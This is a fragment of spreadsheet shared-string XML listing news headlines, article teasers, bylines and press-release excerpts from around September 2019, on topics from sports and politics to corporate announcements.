    <t>Arthur Kaptainis, Special to the Montreal Gazette                        More from Arthur Kaptainis, Special to the Montreal Gazette;Allen McInnis;Allen McInnis</t>
  </si>
  <si>
    <t>“The goal is not to have a 52-week concert season. This would detract from our capacity to be adventurous.”</t>
  </si>
  <si>
    <t>Parents looking for subscriptions boxes to keep their children educationally entertained have many, many options, including names like...</t>
  </si>
  <si>
    <t>It comes after the UK Supreme Court unanimously ruled that Prime Minister Boris Johnson acted unlawfully in shutting down parliament for...</t>
  </si>
  <si>
    <t>Alex Didion</t>
  </si>
  <si>
    <t>No AB, no problem. The Raiders made a statement Monday night that they don’t need the embattled wide receiver to win, taking down the...</t>
  </si>
  <si>
    <t>Rob Delaney has sent his love to other bereaved parents on what would have been his late son’s first day of school. His son Henry died...</t>
  </si>
  <si>
    <t>Global Hospital Linen Supply and Management Services Market size is expected to reach USD 9.4 billion by 2025. Hospital Linen Supply and...</t>
  </si>
  <si>
    <t>Ryan Kent believes he has finally found his home at Ibrox after sealing a £7.5million Rangers return. The former Liverpool youngster was a...</t>
  </si>
  <si>
    <t>A report claimed around 50% of the workforce employed at the iPhone factory in Zhengzhou, China, were temporary hires.</t>
  </si>
  <si>
    <t>AMSTERDAM, Sept. 27, 2019 /PRNewswire/ -- Inspur, a leading data center and AI full-stack solutions provider, today announced two...</t>
  </si>
  <si>
    <t>SOURCE: FedEx Corporation The Forbes article notes the importance of a company focusing its CSR efforts in ways that are “unique to your...</t>
  </si>
  <si>
    <t>Kathleen Saylors                        More from Kathleen Saylors</t>
  </si>
  <si>
    <t>This year’s Woodstock Art Gallery Taste of Art event is back, inviting people into the historic downtown building for a night of food,...</t>
  </si>
  <si>
    <t>BANGKOK (AP) — Stocks skidded in Asia on Wednesday after Democrats in the U.S. House of Representatives said they were considered launching...</t>
  </si>
  <si>
    <t>/PRNewswire/ -- Replika Software (www.replikasoftware.com) was selected by LVMH Group's La Maison des Startups, expands to Europe and will be based at Station F in Paris. Replika Software is the award-winning digital clienteling and social selling solution. Replika empowers sales associates and brand ambassadors to inspire and sell via text, email &amp; social media on any platform. The suite of tools allows social sellers to connect with customers, create wish lists for them and receive retribution when sales are made. Originally, Replika Software was built specifically for the luxury industry, enabling brands to empower their well-trained sales associates to extend the inspiration and human connection to their customers online. Replika now also provides a turn-key mobile business for any approved brand ambassador to connect with their clients (followers) and includes a full marketing suite along with social sharing tools for brands of any type and size to build social selling teams at scale. "With our solution, brands empower social sellers to provide authenticity, emotion and expertise to their clients wherever they are. Fundamentally luxury shopping has always been about a human interaction and inspiration. Replika technology can scale that," - said Kareen Mallet, Co-Founder and a former luxury retail executive. La Maison des Startups/LVMH aims to accelerate collaboration between LVMH Maisons and Startups whose solutions have potential in the luxury industry. LVMH vetted roughly 1,000 startup companies and chose Replika as part of a select group of 26 entrepreneurial companies for the third season of their in-house accelerator program. Replika Software was specifically selected for its potential in offering solutions within several categories including, In-Store Experience, Personalization and Clienteling. LVMH has already signed over 70 commercial agreements with startup companies from the previous two seasons of La Maison des Startups. "LVMH selected Replika as one of the finalists for their annual Innovation award and showcased the platform at this year's Vivatech summit in Paris. We are thrilled to continue our partnership with them through La Maison Des Startups," added Corey Gottlieb, Co-Founder. Replika Software is a NYC based company founded in 2016 by former Neiman Marcus Group's Fashion Director Kareen Mallet and Corey Gottlieb, a former corporate sales executive and a serial entrepreneur. The company has now opened a French subsidiary and expanded their day-to-day operations to their new Paris-based office. Contact: Replika Software Kareen Mallet kareen.mallet@replikasoftware.com SOURCE Replika Software LLC.</t>
  </si>
  <si>
    <t>Below are the three companies in the Electronic Components industry with the lowest (positive) free cash flow per share. FCF/share is a...</t>
  </si>
  <si>
    <t>AFL COMMUNITY PAYS TRIBUTE TO ST KILDA LEGEND DANNY FRAWLEY: "He was my captain for nine years here at the Saints and so when I first...</t>
  </si>
  <si>
    <t>On September 19, 2019, a three-member JAMS panel issued an Interim Award in the arbitration between Intellia Therapeutics, Inc. (Intellia)...</t>
  </si>
  <si>
    <t>NEW YORK, Sept. 20, 2019 (GLOBE NEWSWIRE) -- Attorney Advertising -- Bronstein, Gewirtz &amp; Grossman, LLC reminds investors that a class...</t>
  </si>
  <si>
    <t>Danessa Lincoln</t>
  </si>
  <si>
    <t>Southpoint Capital Advisors LP boosted its stake in shares of LKQ Co. (NASDAQ:LKQ) by 1.0% in the second quarter, according to its most...</t>
  </si>
  <si>
    <t>Originally posted on https://newswatchtv.com/2019/06/12/third-british-dont-track-mobile-spending/ A new survey from the phone insurance...</t>
  </si>
  <si>
    <t>Corporate governance features have become increasingly prominent for public companies. This has accelerated as economic-oriented activist...</t>
  </si>
  <si>
    <t>After World of Warcraft first launched on November 23, 2004, it took gamers 69 days to defeat the endgame raid boss Onyxia. The ten bosses...</t>
  </si>
  <si>
    <t>/EIN News/ -- EDEN PRAIRIE, Minn., Sept. 19, 2019 (GLOBE NEWSWIRE) -- CHF Solutions, Inc. (Nasdaq:CHFS) today announced that Claudia Napal...</t>
  </si>
  <si>
    <t>Robert Fairnie</t>
  </si>
  <si>
    <t>Spider season has officially arrived...</t>
  </si>
  <si>
    <t>Savannah Behrmann</t>
  </si>
  <si>
    <t>Former Vice President Joe Biden again called for President Donald Trump to release the transcript of his July phone call with Ukrainian...</t>
  </si>
  <si>
    <t>This UAW strike against GM is about increased wages and benefits. UAW has about $721M in the strike fund, and strikers only make $250/week...</t>
  </si>
  <si>
    <t>DENVER, Sept. 16, 2019 /PRNewswire/ -- WOW! Internet, Cable &amp; Phone (NYSE: WOW), a leading broadband and communications service provider,...</t>
  </si>
  <si>
    <t>ABC/Heidi GutmanGreen Day, Weezer and Fall Out Boy are hitting the road together on their Hella Mega Tour in 2020, and to mark the event,...</t>
  </si>
  <si>
    <t>WEST CHESTER, Ohio, Sept. 23, 2019 (GLOBE NEWSWIRE) — AK Steel (NYSE: AKS) said today that members of the United Auto Workers (UAW), Local...</t>
  </si>
  <si>
    <t>The Union of British Columbia Municipalities (UBCM) on September 27 rejected by 51.7% a motion to ask Victoria to amend the Passenger...</t>
  </si>
  <si>
    <t>(NewMediaWire) - September 12, 2019 - CHICAGO - The American Heart Association, the world’s leading nonprofit organization focused on heart...</t>
  </si>
  <si>
    <t>WASHINGTON (AP) — The Latest on President Donald Trump and a whistleblower complaint (all times local): 5:20 p.m. President Donald Trump is...</t>
  </si>
  <si>
    <t>Precision Biosciences</t>
  </si>
  <si>
    <t>Phase 1/2a Clinical Trial of Off-The-Shelf Anti-CD20 CAR T Therapy Candidate in Patients with NHL, CLL, and SLL Expected to Begin in Fourth...</t>
  </si>
  <si>
    <t>The Nepal Earthquake Housing Reconstruction Project (EHRP) extensively used technology solutions to assess post-earthquake housing damage...</t>
  </si>
  <si>
    <t>Baker Hughes, a GE company (NYSE: BHGE) will hold a webcast on Wednesday, October 30, 2019 to discuss the results for the third quarter...</t>
  </si>
  <si>
    <t>By Rex Weyler September 13, 2019 After [World War II], the U.S., Britain, France, and Russia rushed for Middle Eastern oil fields. It was...</t>
  </si>
  <si>
    <t>Prosus, a spinoff of South African consumer internet group Naspers valued at $100 billion, listed on the Amsterdam Euronext exchange...</t>
  </si>
  <si>
    <t>New Red Lake Nation Royalty 2019-2020 Sr. Miss Red Lake Nation - Elise White Sr. Brave - Sidney Kingbird Jr. Miss Red Lake Nation - Natanne...</t>
  </si>
  <si>
    <t>Emma D'Agostino</t>
  </si>
  <si>
    <t>FOUR points deprived 96-year-old Peg Coates - and all other Collingwood fans - from cheering the team on in the AFL Grand Final. But a slim...</t>
  </si>
  <si>
    <t>Leslie Aguilar;Maggie Holmes</t>
  </si>
  <si>
    <t>FAIRWAY, KS (KCTV) -- On an HBO sports show surrounded by professional athletes, California’s governor made a bold prediction. “It’s going...</t>
  </si>
  <si>
    <t>DUBLIN, Sept. 20, 2019 /PRNewswire/ -- The "Digital Tire Solutions Market in India By Type of Vehicle (Truck, Bus, and Others), Components...</t>
  </si>
  <si>
    <t>Marcus James Dixon               @marcusdixon</t>
  </si>
  <si>
    <t>You win some, you lose some. Even though Jackson Michie earned bragging rights on Wednesday night as the winner of “Big Brother” Season 21,...</t>
  </si>
  <si>
    <t>Charles Miranda and Natasha Christian, News Corp Australia Network</t>
  </si>
  <si>
    <t>Australian unleaded petrol prices could blow out to $1.76 per litre due to fears of a new conflict in the Middle East, but some sneaky fuel...</t>
  </si>
  <si>
    <t>Geri Gentry</t>
  </si>
  <si>
    <t>Kloeckner &amp; Co SE (ETR:KCO)’s stock price reached a new 52-week high during trading on Friday . The company traded as high as €5,455,000.00...</t>
  </si>
  <si>
    <t>Asian Lite News</t>
  </si>
  <si>
    <t>TWEET: “The real reason Katappa killed Bahubali was to prevent him from doing ‘Saaho’.” Film: “Saaho” , Cast: Prabhas, Shraddha Kapoor,...</t>
  </si>
  <si>
    <t>Martin Taylor</t>
  </si>
  <si>
    <t>YOKOTA AIR BASE, TOKYO, JAPAN</t>
  </si>
  <si>
    <t>SANTA BARBARA, Calif. — A fire raged through a boat carrying recreational scuba divers anchored near an island off the Southern California...</t>
  </si>
  <si>
    <t>The new membership program offers detailed insight into the foodservice industry to maximize sales strategy and effectively reach operators...</t>
  </si>
  <si>
    <t>Kristin dePaula</t>
  </si>
  <si>
    <t>Technology can come at a cost, but here to simplify your home maintenance routine and give you more time to spend doing what you love is...</t>
  </si>
  <si>
    <t>(RE)MARKS on Panthers victory over the Arizona Cardinals...</t>
  </si>
  <si>
    <t>Andrew Topping</t>
  </si>
  <si>
    <t>All lanes reopen on M1 near Mansfield and Derbyshire following breakdown - Mansfield and Ashfield Chad</t>
  </si>
  <si>
    <t>DETROIT (AP) — In a story published on Sept. 11 about a General Motors recall of SUVs and pickup trucks, The Associated Press relied on...</t>
  </si>
  <si>
    <t>MINNEAPOLIS, Sept. 30, 2019 /PRNewswire/ -- The pioneer of portable recreational oxygen since 2005, Oxygen Plus (O+), Inc. is excited to...</t>
  </si>
  <si>
    <t>Rebecca Fiala</t>
  </si>
  <si>
    <t>HIGH SCHOOL FOOTBALL Non-Conference DURAND 6 EC REGIS 45 Rain returns Sunday with Severe weather chances Sunday night and especially...</t>
  </si>
  <si>
    <t>HSBC and CIBC providing debt and Bank of America Merrill Lynch tax equity finance for 218MW Prevailing project</t>
  </si>
  <si>
    <t>According to the APWG's new Phishing Activity Trends Report, phishing attacks continued to rise into the summer of 2019 with cybercrime...</t>
  </si>
  <si>
    <t>LOS ANGELES (AP) — Caeleb Dressel might want to start practicing his acceptance speech for the Golden Goggles. He's the only swimmer...</t>
  </si>
  <si>
    <t>Alfred Branch, Patch Staff</t>
  </si>
  <si>
    <t>Annette Sloan, who suffers from dementia, was last seen on Sept. 25.</t>
  </si>
  <si>
    <t>The Inaugural Event Hosted Six Korean Companies to Highlight the US Startup Ecosystem.</t>
  </si>
  <si>
    <t>Romain Saiss has called on Wolves to stick together as they battle to revive their season. The midfielder has demanded unity ahead of...</t>
  </si>
  <si>
    <t>At Caye Caulker today, the community is picking up the pieces following a deadly fire. Early on Saturday morning, the quiet in the village...</t>
  </si>
  <si>
    <t>This post is by Colby Hall from Mediaite Click here to view on the original site: Original Post Meghan McCain did not hold back in her...</t>
  </si>
  <si>
    <t>The "Debt Collection Software Market by Component (Software, Services), Organization Size, Deployment Type, User Type (Financial...</t>
  </si>
  <si>
    <t>Content marketing specialist Untold – which has fewer than 10 staff – has beaten off five agencies, including major networks, to scoop the...</t>
  </si>
  <si>
    <t>NEW YORK — David Muir hits the five-year mark at "World News Tonight with a milestone that's increasingly rare in television. His average...</t>
  </si>
  <si>
    <t>mjwinsmith</t>
  </si>
  <si>
    <t>mjwinsmith California Daily 3 Evening 6-Way Box 7-8-9 7-9-8 $40 mjwinsmith Delaware Play 3 Night 6-Way Box 0-2-1 0-1-2 $40 mjwinsmith...</t>
  </si>
  <si>
    <t>Willis Towers Watson have announced the appointment of Rash Bhabra as Head of the firm’s Retirement business in Great Britain. In his role, Rash will be responsible for overseeing the continued growth of Willis Towers Watson’s leading retirement and pensions consultancy business.</t>
  </si>
  <si>
    <t>Rash joined Willis Towers Watson over 20 years ago, and has held a variety of leadership positions, including Head of Financial Services...</t>
  </si>
  <si>
    <t>Global “Pile Driver Market”2019 Research report provides information regarding market size, share, trends, growth, cost structure,...</t>
  </si>
  <si>
    <t>NORFOLK, Va., Sept. 23, 2019 /PRNewswire/ -- Claude Mongeau has been elected a director of Norfolk Southern Corporation (NYSE: NSC)...</t>
  </si>
  <si>
    <t>In a letter to Vice President Pence, American Principles Project and a number of other groups, including International Christian Concern,...</t>
  </si>
  <si>
    <t>There is a lot of concern about the forward outlook for equity markets simply based on this year’s strong performance against a backdrop of...</t>
  </si>
  <si>
    <t>Jim Parker, Windsor Star                        More from Jim Parker, Windsor Star;Nick Brancaccio</t>
  </si>
  <si>
    <t>Former Windsor Spitfires co-owner and general manager Warren Rychel was named head coach of the OHL's Barrie Colts on Monday....</t>
  </si>
  <si>
    <t>Chilton Capital Management LLC lessened its stake in shares of Schlumberger Limited. (NYSE:SLB) by 10.6% during the 2nd quarter, according...</t>
  </si>
  <si>
    <t>Redhawk Wealth Advisors Inc. purchased a new stake in shares of Marvell Technology Group Ltd. (NASDAQ:MRVL) during the 2nd quarter,...</t>
  </si>
  <si>
    <t>MIDDLESEX, N.J., Sept. 1, 2019 /PRNewswire-PRWeb/ -- Whether you have just started a new job or need additional protection when working on...</t>
  </si>
  <si>
    <t>Matt Honeycombe-Foster</t>
  </si>
  <si>
    <t>The Labour leader has been urged by senior figures in the party to explicitly back staying in the EU</t>
  </si>
  <si>
    <t>by Sean Teuma</t>
  </si>
  <si>
    <t>SECOND DIVISION A dominant all-round performance has lifted Gatton to a massive 44-10 preliminary final victory over Goondiwindi. The Hawks...</t>
  </si>
  <si>
    <t>(via TheNewswire) Vancouver, B.C. - TheNewswire - September 17th, 2019 - HERITAGE CANNABIS HOLDINGS CORP. (CNSX:CANN.CN) ("Heritage" or...</t>
  </si>
  <si>
    <t>Adam Wells</t>
  </si>
  <si>
    <t>Indianapolis Colts kicker Adam Vinatieri is hoping to clear his mind in an attempt to overcome his early-season struggles. "I'm going to...</t>
  </si>
  <si>
    <t>SETH BORENSTEIN</t>
  </si>
  <si>
    <t>WASHINGTON (AP) — A federal agency reversed course Friday on the question of whether President Donald Trump tweeted stale information about...</t>
  </si>
  <si>
    <t>Philadelphia Phillies (78-74, fourth in the NL East) vs. Cleveland Indians (91-63, second in the NL Central) Cleveland; Saturday, 7 p.m....</t>
  </si>
  <si>
    <t>HID Global, an Austin, Texas-based marketer of identity security products, has acquired HydrantID of Salt Lake City. HydrantID provides...</t>
  </si>
  <si>
    <t>Former Liberal MP Sarah Henderson will return to parliament after winning preselection to fill a Victorian Senate vacancy. Ms Henderson...</t>
  </si>
  <si>
    <t>TULSA, Okla., Sept. 14, 2019 /PRNewswire-PRWeb/ -- GreenTheVoteOk, one of the most reliable online resource providers on the CBD and...</t>
  </si>
  <si>
    <t>Former Dallas police officer Amber Guyger is escorted by a security detail as she arrives for her murder trial at the Frank Crowley...</t>
  </si>
  <si>
    <t>Kate Gibson</t>
  </si>
  <si>
    <t>Summer just ended, but seasonal hiring is already at hand, with Target and UPS detailing plans to add a combined 230,000 workers for the...</t>
  </si>
  <si>
    <t>BOSTON, Sept. 26, 2019 /PRNewswire-PRWeb/ -- Boston Software Systems announces the company's new analytics dashboard, Boston Productivity...</t>
  </si>
  <si>
    <t>Red River, a technology transformation company, announced today that it has acquired Washington D.C.-based CWPS. The acquisition adds...</t>
  </si>
  <si>
    <t>Swiss swingman Sefolosha to sign with NBA Rockets: reports</t>
  </si>
  <si>
    <t>Butte County Supervisors are working to learn how a pipeline from Paradise to Chico would impact the groundwater.</t>
  </si>
  <si>
    <t>BNY Mellon Municipal Bond Infrastructure Fund, Inc. (NYSE: DMB) announced that certain fund statistics as of August 31, 2019 are now...</t>
  </si>
  <si>
    <t>Kaden Fitzgerald</t>
  </si>
  <si>
    <t>Sharp instruments generally contaminated with an infected patient’s blood can transmit several diseases, including hepatitis B, hepatitis...</t>
  </si>
  <si>
    <t>DRAPER, UT / ACCESSWIRE / September 26, 2019 / Dwelo, the provider of smart-home solutions purpose-built for apartments is excited to...</t>
  </si>
  <si>
    <t>This undated photo provided by Heritage Auctions in September 2019 shows a home in Phoenix designed by architect Frank Lloyd Wright. The...</t>
  </si>
  <si>
    <t>RADNOR, Pa., Sept. 24, 2019 (GLOBE NEWSWIRE) -- The law firm of Kessler Topaz Meltzer &amp; Check, LLP reminds Valaris plc (NYSE: VAL)...</t>
  </si>
  <si>
    <t>Oklahoma man says he was beaten by church members attempting to 'pray his gay away'</t>
  </si>
  <si>
    <t>Share this article - Ten gamers to compete for the biggest-ever prize in esports racing - "California Dreaming" tour to include road...</t>
  </si>
  <si>
    <t>"By PA Reporter" /</t>
  </si>
  <si>
    <t>Meghan, the Duchess of Sussex, was in the crowd in New York who saw her friend Serena Williams downed in the US Open final by Canadian...</t>
  </si>
  <si>
    <t>By:                                       WCPO staff</t>
  </si>
  <si>
    <t>CINCINNATI — A director of the School for the Creative and Performing Arts accepted a job as a college president and will be resigning from...</t>
  </si>
  <si>
    <t>The FCC's multi-year effort to kill media consolidation rules at the behest of giants like Sinclair Broadcasting has been rejected by the...</t>
  </si>
  <si>
    <t>Vivaldi Capital Management LLC grew its holdings in shares of Accenture Plc (NYSE:ACN) by 123.7% during the second quarter, according to...</t>
  </si>
  <si>
    <t>LAS VEGAS (AP) — Democrat Pete Buttigieg is using an impressive fundraising haul to quickly grow his presidential campaign in early state...</t>
  </si>
  <si>
    <t>By Charlotte PaxtonSenior Video Journalist</t>
  </si>
  <si>
    <t>Police who stopped an alleged drug dealer uncovered this haul of suspected mamba hidden in his pants. Cops stopped the man on Lower Temple...</t>
  </si>
  <si>
    <t>South London rapper Dave 0 comment South London rapper Dave has scooped the two biggest prizes of the night at the AIM Independent Music...</t>
  </si>
  <si>
    <t>Colleen Knudsen</t>
  </si>
  <si>
    <t>BLAIR COUNTY, Pa. (WTAJ) — Folks in Blair County are invited to practice using the new voting machines. The sessions will be held over the...</t>
  </si>
  <si>
    <t>Loudspeaker manufacturers Genelec announced three additions to The Ones family of point-source active reference monitors in a launch at...</t>
  </si>
  <si>
    <t>Asteroid that killed the dinosaurs was as strong as 10 billion atomic bombs, study says</t>
  </si>
  <si>
    <t>SEATTLE (AP) - When Marge Plecki and her husband built their retirement home on an island north of Seattle in 2002, they were aware the...</t>
  </si>
  <si>
    <t>UNITED NATIONS (Reuters) - A meeting of signatories to a Latin American mutual defense pact, known as the Rio Treaty, on Monday afternoon...</t>
  </si>
  <si>
    <t>Yo_Mama_Been_Loggin</t>
  </si>
  <si>
    <t>As political journalists, we follow the 2020 presidential primary race day by day  or even minute by minute. Still, we know that plenty of...</t>
  </si>
  <si>
    <t>TOKYO — Oil futures fell on Friday as optimism over an end to the U.S.-China trade war faded, leaving prices set for a weekly loss after...</t>
  </si>
  <si>
    <t>Jane Goddard</t>
  </si>
  <si>
    <t>Stone plaque tells us it was a consanguinitarium! Earl Howe Street, Highfields, Leicester, in 1970 This rather unassuming building in...</t>
  </si>
  <si>
    <t>AMSTERDAM, Sept. 25, 2019 /PRNewswire/ -- International Endesa B.V. (IE BV) has published its 2019 interim financial statements for the...</t>
  </si>
  <si>
    <t>The funky lure single seems on Submit Malone’s new album, “Hollywood Bleeding,” which dropped on September 6. A number of days after the...</t>
  </si>
  <si>
    <t>DENVER (KCNC/CNN) - After a Colorado school bus driver reportedly refused to let students off the bus following behaviorial issues, one...</t>
  </si>
  <si>
    <t>by SAM PETREQUIN and CLAIRE PARKER Associated Press</t>
  </si>
  <si>
    <t>PARIS (AP) — Former French President Jacques Chirac was given full military honors Monday as past and current world leaders gathered in...</t>
  </si>
  <si>
    <t>Michael Lev Arizona Daily Star</t>
  </si>
  <si>
    <t>Here are five storylines to watch as the Arizona Wildcats open Pac-12 play against UCLA Saturday night at Arizona Stadium: DT Trevon Mason...</t>
  </si>
  <si>
    <t>LOS ANGELES, September 18, 2019 /PRNewswire-PRWeb/ -- InvoTech Systems Inc. announced the recent implementation of its Linen System at W...</t>
  </si>
  <si>
    <t>James Bond back behind the wheel of a DB5 for No Time to Die</t>
  </si>
  <si>
    <t>Reports and Data</t>
  </si>
  <si>
    <t>Virtual Mobile Infrastructure Market Size – USD 96.5 Million in 2018, Market Growth - CAGR of 9.0%. Virtual Mobile Infrastructure Industry...</t>
  </si>
  <si>
    <t>Future Market Insights (FMI), recently published an extensive report that assesses the lead acid battery market. In addition, the report...</t>
  </si>
  <si>
    <t>AMERSHAM, U.K. and MALVERN, Pa., September 9, 2019 /PRNewswire-PRWeb/ -- This Autumn Phlexglobal will host the annual TMF World Forum, two...</t>
  </si>
  <si>
    <t>MICHAEL WARNER, Herald Sun</t>
  </si>
  <si>
    <t>Peggy O’Neal was trudging solo around Uluru last August when a group of mountain-bikers pedalled by. “Somebody yelled out, ‘Peggy — it’s...</t>
  </si>
  <si>
    <t>TAIPEI, Taiwan (AP) — The Solomon Islands switched diplomatic recognition from Taiwan to China on Monday, becoming the latest country to...</t>
  </si>
  <si>
    <t>Huawei’s founder has described the UK’s scrutiny over its 5G equipment as vigorous and welcomed other countries to do the same level of...</t>
  </si>
  <si>
    <t>Gabriella Borter</t>
  </si>
  <si>
    <t>Hurricane Dorian has intensified into a dangerous category 5 storm as it hit the Bahamas, forecast to pound the islands with up to two...</t>
  </si>
  <si>
    <t>BIRMINGHAM, Ala., Sept. 1, 2019 /PRNewswire-PRWeb/ -- Geographic Information Services, Inc. (GISinc), the Premier GIS Services firm...</t>
  </si>
  <si>
    <t>Jennifer Lopez has asked Supreme Court Justice Ruth Bader Ginsburg for marriage advice. The 'On the Floor' hitmaker is set to tie the knot...</t>
  </si>
  <si>
    <t>Bruce Baer Arnold, Assistant Professor, School of Law, University of Canberra</t>
  </si>
  <si>
    <t>When you visit a pharmacy, your main focus is probably getting your script filled, or some advice on an over-the-counter medication. While...</t>
  </si>
  <si>
    <t>Immutable, a company that builds video games with player-owned assets, today announced that they have raised a $15 million Series A round...</t>
  </si>
  <si>
    <t>Anam Khan</t>
  </si>
  <si>
    <t>Stephenson says her motto of 'do good' to sell ethically sourced clothing is what she was inspired to apply to her daily life</t>
  </si>
  <si>
    <t>Erica Thomas</t>
  </si>
  <si>
    <t>One of Victoria’s most prominent silks and a serial class action litigant accused of improperly claimed legal fees and commissions from...</t>
  </si>
  <si>
    <t>The "Heat Exchangers - A Global Market Overview" report has been added to ResearchAndMarkets.com's offering. While Tabular Heat Exchangers...</t>
  </si>
  <si>
    <t>Britain's Got Talent judge Amanda Holden has reportedly been banned from wearing a revealing jumpsuit for a charity skydive. Holden, who...</t>
  </si>
  <si>
    <t>NEW YORK, NY / ACCESSWIRE / September 18, 2019 / The securities litigation law firm of The Gross Law Firm issues the following notice on...</t>
  </si>
  <si>
    <t>Dalila Thomas</t>
  </si>
  <si>
    <t>Budget Bites is a series that looks for the best food and drink deals at restaurants in Dallas-Fort Worth — because being on a budget...</t>
  </si>
  <si>
    <t>Lenovo (HKSE: 992) (ADR: LNVGY) today announced a new consumer loyalty program that lets customers earn rewards on everything they buy on...</t>
  </si>
  <si>
    <t>Zach Spedden</t>
  </si>
  <si>
    <t>The first season of the Fayetteville Woodpeckers (High A; Carolina League) at Segra Stadium was a success for downtown businesses,...</t>
  </si>
  <si>
    <t>DENVER, Sept. 10, 2019 (GLOBE NEWSWIRE) -- Sundance Energy Australia Limited (ASX: SEA) (NASDAQ: SNDE) (“Sundance” or the “Company”) is...</t>
  </si>
  <si>
    <t>Eric Heyl, Patch Staff</t>
  </si>
  <si>
    <t>The semi-finalists names were announced Wednesday.</t>
  </si>
  <si>
    <t>By TOM CANAVAN AP Sports Writer</t>
  </si>
  <si>
    <t>The New York Giants are in trouble again, and it has nothing to do with either of the quarterbacks or the offense. The defense was horrible...</t>
  </si>
  <si>
    <t>By MARTHA WAGGONER Associated Press</t>
  </si>
  <si>
    <t>LUMBER BRIDGE, N.C. (AP) — "Okay, Mommy. I love you." That was Brenda Scurlock's last text from her son, Avery, before he was shot eight...</t>
  </si>
  <si>
    <t>Ken Root</t>
  </si>
  <si>
    <t>Genetically enhanced, farm raised salmon struggled upstream for 20 years to make it to market. What weekly commentator and former U.S....</t>
  </si>
  <si>
    <t>There is little doubt that the New Zealand haka is the world’s most recognisable war dance but the Rugby World Cup in Japan will feature no...</t>
  </si>
  <si>
    <t>Erica Herman, the girlfriend of Tiger Woods, has been dismissed from a wrongful death lawsuit brought by the parents of a deceased...</t>
  </si>
  <si>
    <t>BRUSSELS, Sept 27 (Reuters) - The European Union and Britain have yet to narrow their differences to reach a new agreement on London's...</t>
  </si>
  <si>
    <t>PR Newswire RESTON, Va., Sept. 26, 2019 /PRNewswire/ -- Unisys Corporation (UIS) (NYSE: UIS) today announced the U.S. Defense Information...</t>
  </si>
  <si>
    <t>It all came down to one kick in the second half.</t>
  </si>
  <si>
    <t>Michael Tepper</t>
  </si>
  <si>
    <t>Investors sentiment increased to 1.02 in Q1 2019. Its up 0.32, from 0.7 in 2018Q4. It is positive, as 35 investors sold WU shares while 148...</t>
  </si>
  <si>
    <t>Four terrorist acts including the killings of two leaders of the BJP and the RSS in Jammu and Kashmir's Kishtwar district were solved with...</t>
  </si>
  <si>
    <t>England are 23 for one in their reply to Australia’s 497 for eight.</t>
  </si>
  <si>
    <t>You may think detailing an old heap like yours is a waste of time and money. It’s not.</t>
  </si>
  <si>
    <t>Sajid Javid said he was “turning the page on austerity” with a £13.4 billion spending spree aimed at boosting Tory chances in the expected...</t>
  </si>
  <si>
    <t>ATLANTA, Sept. 18, 2019 /PRNewswire/ -- OneTrust, the leader in privacy, security and third-party risk technology, today announced the...</t>
  </si>
  <si>
    <t>Taylor Swift's trespasser took his shoes off before he entered her mansion. Richard Joseph McEwan, 26, was found inside the 'Blank Space'...</t>
  </si>
  <si>
    <t>HOUSTON, Sept. 16, 2019 /PRNewswire/ -- Jim Claunch, a 35-year veteran of the energy sector, has joined Bain &amp; Company's Oil &amp; Gas practice...</t>
  </si>
  <si>
    <t>Some $1.7 million for job training and other career assistance will continue to be available for workers laid off from Wyoming's coal...</t>
  </si>
  <si>
    <t>The owner of Tinder and OkCupid is being sued by U.S. regulator for seeking to draw in potential subscribers with emails from fake users...</t>
  </si>
  <si>
    <t>Barcelona goalkeeper Marc-Andre Ter Stegen’s double save from a penalty helped earn a 0-0 draw in their Champions League opener at Borussia...</t>
  </si>
  <si>
    <t>SOURCE Brandner Gives Back Brandner Gives Back's invites all of NOLA to attend their First Annual Gettin' Piggy With It charity fundraiser...</t>
  </si>
  <si>
    <t>MIAMI, Sept. 17, 2019 /PRNewswire/ -- Council of the Americas (COA) announces the final group of leaders that will be honored at the 25th...</t>
  </si>
  <si>
    <t>SACRAMENTO, Calif. and MUMBAI, India, Sept. 11, 2019 /PRNewswire/ -- A thirteen-year-old musical prodigy has recently earned the Assist...</t>
  </si>
  <si>
    <t>THE WOODLANDS, Texas, September 12, 2019 /PRNewswire-PRWeb/ -- On 7 September 2019, the National Safety Council named Charles J. Douros as...</t>
  </si>
  <si>
    <t>SOURCE: CBRE Group, Inc. LOS ANGELES, September 27, 2019 - CBRE announced that Crystal Lawson, a Health Safety &amp; Environment (HS&amp;E) Senior...</t>
  </si>
  <si>
    <t>by Stephen Halliday</t>
  </si>
  <si>
    <t>Rangers manager Steven Gerrard has accused his Scotland counterpart Steve Clarke of lacking respect by putting Ryan Jack through a double...</t>
  </si>
  <si>
    <t>On Sep 10, we issued an updated research report on Crown Holdings, Inc. (CCK - Free Report) . The company is well poised to benefit...</t>
  </si>
  <si>
    <t>The series of global events gives attendees an opportunity to learn more about safety and security in today's hyper-connected world...</t>
  </si>
  <si>
    <t>By COLLEEN LONG, MARTHA MENDOZA and GARANCE BURKE, Associated Press</t>
  </si>
  <si>
    <t>WASHINGTON — Migrant children who were separated from their parents at the U.S.-Mexico border last year suffered post-traumatic stress and...</t>
  </si>
  <si>
    <t>Wayne Parry, Associated Press</t>
  </si>
  <si>
    <t>STONE HARBOR, N.J. (AP) — New Jersey, which has waged relentless court battles to build protective sand dunes along its coast, may take the...</t>
  </si>
  <si>
    <t>HOUSTON (KTRK/CNN) - Police said a mother hid her 5-year-old child's body in a closet for almost a week. Police were called to this...</t>
  </si>
  <si>
    <t>Originally posted on https://www.ehypnosis.com/blog/what-is-hypnosis-and-how-does-hypnosis-work Do have any behavioral traits, habits or...</t>
  </si>
  <si>
    <t>News</t>
  </si>
  <si>
    <t>RALEIGH, N.C. (AP) - A North Carolina jury has ordered three law enforcement officials to pay $8.3 million for violating a man's civil...</t>
  </si>
  <si>
    <t>GRIMSBY, Ontario, Sept. 03, 2019 (GLOBE NEWSWIRE) -- Andrew Peller Limited (Toronto Stock Exchange: ADW.A/ADW.B) (“APL” or the “Company”)...</t>
  </si>
  <si>
    <t>By David J. Neal</t>
  </si>
  <si>
    <t>For the second time this week, a drug manufacturer has recalled several lots of Ranitidine for too much NDMA, which laboratory tests have...</t>
  </si>
  <si>
    <t>A jury has ended deliberating for the day in the capital murder trial of a man who claims he was insane when he fatally shot six members of...</t>
  </si>
  <si>
    <t>The family of a woman who died after falling and hitting her head in a Victorian police cell want the world to watch distressing footage of...</t>
  </si>
  <si>
    <t>Three lucky Australians who won a share of the $150-million lotto jackpot may not even realise they are multimillionaires. Two...</t>
  </si>
  <si>
    <t>PHOENIX (AP) — Odyssey Sims scored 11 of her 22 points in a game-changing and contentious third quarter and the Minnesota Lynx rolled to an...</t>
  </si>
  <si>
    <t>Meritage Homes Corporation’s MTH continuous focus on building homes for entry-level, first-time and move-up buyers has been yielding...</t>
